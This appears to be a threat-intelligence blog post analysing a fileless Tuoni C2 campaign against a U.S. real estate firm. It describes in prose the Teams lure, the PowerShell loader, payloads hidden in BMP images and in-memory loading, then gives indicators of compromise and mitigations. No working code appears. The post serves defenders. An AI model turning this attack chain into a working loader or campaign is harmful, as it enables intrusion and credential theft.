Hidden in Plain Sight: Fileless Tuoni C2 Malware Uses Images and AI to Infiltrate U.S. Real Estate Firms

Aegiron 9 mins0

Executive overview

In early January 2026, security researchers disclosed a highly sophisticated, stealth-focused malware campaign leveraging the Tuoni command-and-control (C2) framework. The operation specifically targeted U.S.-based real estate organizations and demonstrated advanced tradecraft, including fileless execution, steganography, in-memory reflective loading, and AI-assisted obfuscation.

The attack did not rely on traditional malware binaries. Instead, it abused trusted tools (PowerShell), common collaboration platforms (Microsoft Teams), and benign-looking image files to evade detection. The campaign was stopped before full compromise, but it highlights a serious shift toward memory-only, socially engineered intrusions aimed at enterprise environments.

What is Tuoni C2?

Tuoni is a modular post-exploitation and command-and-control framework originally designed for red-team operations and adversary simulation. In malicious hands, it functions as a full-featured C2 platform capable of:

  • Deploying lightweight agents directly into memory
  • Executing commands remotely
  • Harvesting credentials
  • Performing lateral movement
  • Deploying secondary payloads such as ransomware or data exfiltration tools

Tuoni is attractive to attackers because:

  • It supports fileless execution
  • It blends into normal system activity
  • It allows custom loaders, which attackers can heavily obfuscate
  • It can be adapted quickly using AI-generated or dynamically assembled code

Who was targeted and why it matters

Targeted industry

  • U.S. real estate sector
  • Specifically, a large enterprise-level real estate firm

Why real estate?

Real estate organizations often:

  • Handle high-value financial transactions
  • Store sensitive personal and financial data
  • Rely heavily on third-party vendors and contractors
  • Use collaboration platforms extensively
  • Operate with mixed IT maturity across subsidiaries and offices

This makes them attractive for:

  • Credential theft
  • Business email compromise (BEC)
  • Ransomware staging
  • Financial fraud and wire transfer abuse

How the attack worked (step-by-step)

1. Social engineering via collaboration tools

Attackers initiated contact through Microsoft Teams, impersonating:

  • A vendor
  • An IT support contact
  • A business partner

The message was crafted to appear urgent and legitimate, instructing the victim to run a PowerShell command to “fix” an issue or “verify” access.

This step bypassed many technical defenses by exploiting human trust.

2. PowerShell-based initial loader

Once executed, the PowerShell command:

  • Downloaded a remote script from an attacker-controlled domain
  • Avoided dropping executable files to disk
  • Used native Windows functionality only

Because PowerShell is a trusted administrative tool, this activity often blends in with legitimate IT operations.

3. Steganography inside image files

Instead of downloading malware directly, the script retrieved a BMP image file.

Inside this image:

  • Malicious shellcode was hidden within pixel data
  • The image appeared harmless to basic scanners
  • No suspicious executable headers were present

The PowerShell loader extracted the hidden payload directly from memory.

This technique defeats:

  • Signature-based antivirus
  • Email and file gateway scanning
  • Simple sandbox analysis

4. Fileless, in-memory execution

The extracted payload was:

  • Loaded reflectively into memory
  • Never written to disk
  • Executed inside a legitimate process context

This is known as fileless malware execution.

Benefits for attackers:

  • Minimal forensic artifacts
  • Reduced chance of detection
  • Persistence without traditional persistence mechanisms

5. Tuoni agent deployment

Once active, the in-memory Tuoni agent attempted to:

  • Establish outbound C2 communication
  • Await further instructions
  • Prepare for credential harvesting and lateral movement
  • Potentially stage ransomware or data theft

Security controls interrupted execution before these actions completed.

Role of AI in the campaign

Analysis of the loader code suggested:

  • Dynamically assembled logic
  • Inconsistent formatting and variable naming
  • Rapid mutation between executions

These traits strongly indicate AI-assisted code generation, likely used to:

  • Evade static detection
  • Change execution flow
  • Reduce reuse of known malicious patterns

AI was not “autonomous” in the attack, but it lowered development effort and increased evasiveness.

Impact assessment

Confirmed impact

  • No confirmed data exfiltration
  • No ransomware deployment
  • No persistence mechanisms established
  • Attack was contained at the execution stage

Potential impact if successful

Had the attack not been stopped:

  • Domain credentials could have been stolen
  • Lateral movement across the network was likely
  • Financial systems could have been accessed
  • Ransomware or extortion campaigns could have followed

Indicators of compromise (IOCs)

Network indicators

  • Domain:kupaoquan[.]com
    • Used for payload hosting and C2 communication

File and execution indicators

  • Unexpected BMP image downloads followed by PowerShell activity
  • PowerShell reading image files and allocating executable memory
  • Reflective loading of DLLs without disk artifacts
  • Suspicious in-memory module often referenced as TuoniAgent.dll

Behavioral indicators

  • Microsoft Teams messages requesting script execution
  • PowerShell spawned from Teams, Outlook, or browser processes
  • Abnormal outbound network connections from non-network tools
  • Large memory allocations followed by thread injection

Defensive lessons learned

Key takeaways

  1. Fileless malware is now mainstream
  2. Images are no longer “safe” file types
  3. Social engineering bypasses most technical controls
  4. Memory-based detection is critical
  5. AI is accelerating attacker innovation

Recommended mitigation strategies

Endpoint and system hardening

  • Enable full PowerShell logging (script block + command line)
  • Enforce constrained language mode where possible
  • Restrict reflective loading and memory execution
  • Monitor for abnormal memory allocations

Network security

  • Block known malicious domains at DNS level
  • Monitor outbound traffic from user processes
  • Alert on unusual C2 beaconing patterns

User awareness

  • Train employees never to run scripts from chat messages
  • Conduct Teams-based phishing simulations
  • Reinforce verification of IT or vendor requests

Detection engineering

  • Hunt for image files with high entropy
  • Monitor PowerShell interacting with image formats
  • Correlate chat activity with process execution

Why this campaign matters

This Tuoni C2 operation represents a modern intrusion model:

  • No malware files
  • No obvious exploits
  • No persistence at first
  • Heavy reliance on human interaction and memory abuse

It shows how attackers are moving beyond traditional malware into stealthy, adaptable, low-noise operations that challenge conventional defenses.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.